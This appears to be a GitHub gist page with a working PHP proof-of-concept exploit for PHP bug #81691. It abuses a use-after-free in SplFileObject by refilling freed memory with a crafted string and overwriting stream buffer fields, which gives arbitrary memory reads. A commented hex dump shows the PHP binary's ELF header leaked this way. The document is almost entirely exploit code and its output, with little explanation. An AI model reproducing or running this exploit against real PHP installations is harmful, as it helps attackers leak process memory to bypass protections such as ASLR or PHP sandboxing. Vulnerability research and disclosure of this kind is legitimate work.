Skip to content

Instantly share code, notes, and snippets.

@X-C3LL

X-C3LL/uaf-leak.php

Created January 5, 2022 00:40
Show Gist options
  • Save X-C3LL/136c18087ffda5ac1574e3006302a0e7 to your computer and use it in GitHub Desktop.
Save X-C3LL/136c18087ffda5ac1574e3006302a0e7 to your computer and use it in GitHub Desktop.
Download ZIP
PoC BUG #81691 (PHP)
Raw
uaf-leak.php
<?php
// BUG #81691 https://bugs.php.net/bug.php?id=81691
// POC: Memory Leak via Use-After-Free
//export USE_ZEND_ALLOC=0
function maps(){
$targets = Array();
$raw_map = explode(PHP_EOL,file_get_contents("/proc/self/maps"));
foreach ($raw_map as $line) {
if (strpos($line, "php") !== false && strpos($line, "r-xp") !== false) {
$range = explode(" ", $line);
$split_range = explode("-", $range[0]);
$targets["bin_start"] = hexdec($split_range[0]);
$targets["bin_end"] = hexdec($split_range[1]);
return $targets;
}
}
}
function hex2le($hex){
$a = str_split($hex, 2);
return array_reverse($a);
}
function overwritebytes($data, &$target, $offset) {
for ($i = 0; $i < count($data); $i++){
$target[$offset + $i] = chr(hexdec($data[$i]));
}
}
function leftpad($string) {
return str_pad($string, 16, "00", STR_PAD_LEFT);
}
global $file, $dummy;
class pwn {
//uaf
public function uaf(){
global $file, $dummy;
$contiguous = [];
for ($i = 0; $i < 100; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 200));
}
// Create
$file = new SplFileObject("/dev/null");
// Free
fclose(end(get_resources()));
// Fill
$dummy = str_repeat('X', 200);
}
//_read
public function _read($address, $size) {
global $file, $dummy;
//readbuf (136)
$bin = maps();
$target = hex2le(leftpad($address));
overwritebytes($target, $dummy, 136);
//position (128)
$position = "00";
$position = leftpad($position);
$position = hex2le($position);
overwritebytes($position, $dummy, 128);
//readbuflen (144)
$readbuflen = $size;
$readbuflen = leftpad($readbuflen);
$readbuflen = hex2le($readbuflen);
overwritebytes($readbuflen, $dummy, 144);
//readpos (152)
$readpos = "00";
$readpos = leftpad($readpos);
$readpos = hex2le($readpos);
overwritebytes($readpos, $dummy, 152);
//writepos (160)
$writepos = $size;
$writepos = leftpad($writepos);
$writepos = hex2le($writepos);
overwritebytes($writepos, $dummy, 160);
//chunk_size (168)
$chunk_size = $size;
$chunk_size = leftpad($chunk_size);
$chunk_size = hex2le($chunk_size);
overwritebytes($chunk_size, $dummy, 168);
}
}
$bin = maps();
$elf_start = dechex($bin["bin_start"]);
$pwn = new pwn();
$pwn->uaf();
for ($i = 0; $i < 0x1000; $i += 0xff){
$pwn->_read(dechex($bin["bin_start"] + $i), "ff");
print $file->fread(0xff);
}
/*
psyconauta@insulatergum ᐓ ~/research/php-uaf |
ᐓ php uaf-leak.php | xxd
00000000: 7f45 4c46 0201 0103 0000 0000 0000 0000 .ELF............
00000010: 0300 3e00 0100 0000 e08e 0f00 0000 0000 ..>.............
00000020: 4000 0000 0000 0000 0802 1502 0000 0000 @...............
00000030: 0000 0000 4000 3800 0900 4000 2700 2600 ....@.8...@.'.&.
00000040: 0600 0000 0500 0000 4000 0000 0000 0000 ........@.......
00000050: 4000 0000 0000 0000 4000 0000 0000 0000 @.......@.......
00000060: f801 0000 0000 0000 f801 0000 0000 0000 ................
00000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................
00000080: 3802 0000 0000 0000 3802 0000 0000 0000 8.......8.......
00000090: 3802 0000 0000 0000 1c00 0000 0000 0000 8...............
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000 ................
000000b0: 0100 0000 0500 0000 0000 0000 0000 0000 ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000d0: dc81 ae00 0000 0000 dc81 ae00 0000 0000 ................
000000e0: 0000 2000 0000 0000 0100 0000 0600 0000 .. .............
000000f0: 60c9 b600 0000 0000 60c9 d600 0000 0000 `.......`.......
00000100: 60c9 d600 0000 0000 7865 0900 0000 0000 `.......xe......
00000110: d03f 0b00 0000 0000 0000 2000 0000 0000 .?........ .....
00000120: 0200 0000 0600 0000 60fb bf00 0000 0000 ........`.......
00000130: 60fb df00 0000 0000 60fb df00 0000 0000 `.......`.......
00000140: 4002 0000 0000 0000 4002 0000 0000 0000 @.......@.......
00000150: 0800 0000 0000 0000 0400 0000 0400 0000 ................
00000160: 5402 0000 0000 0000 5402 0000 0000 0000 T.......T.......
00000170: 5402 0000 0000 0000 4400 0000 0000 0000 T.......D.......
00000180: 4400 0000 0000 0000 0400 0000 0000 0000 D...............
00000190: 50e5 7464 0400 0000 5081 a700 0000 0000 P.td....P.......
000001a0: 5081 a700 0000 0000 5081 a700 0000 0000 P.......P.......
000001b0: a4e1 0000 0000 0000 a4e1 0000 0000 0000 ................
000001c0: 0400 0000 0000 0000 51e5 7464 0600 0000 ........Q.td....
000001d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001f0: 0000 0000 0000 0000 1000 0000 0000 0000 ................
00000200: 52e5 7464 0400 0000 60c9 b600 0000 0000 R.td....`.......
00000210: 60c9 d600 0000 0000 60c9 d600 0000 0000 `.......`.......
00000220: a036 0900 0000 0000 a036 0900 0000 0000 .6.......6......
00000230: 0100 0000 0000 0000 2f6c 6962 3634 2f6c ......../lib64/l
00000240: 642d 6c69 6e75 782d 7838 362d 3634 2e73 d-linux-x86-64.s
00000250: 6f2e 3200 0400 0000 1000 0000 0100 0000 o.2.............
00000260: 474e 5500 0000 0000 0200 0000 0600 0000 GNU.............
00000270: 2000 0000 0400 0000 1400 0000 0300 0000 ...............
00000280: 474e 5500 5c5d 5f93 a3af 1a6f e97e 0542 GNU.\]_....o.~.B
*/
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment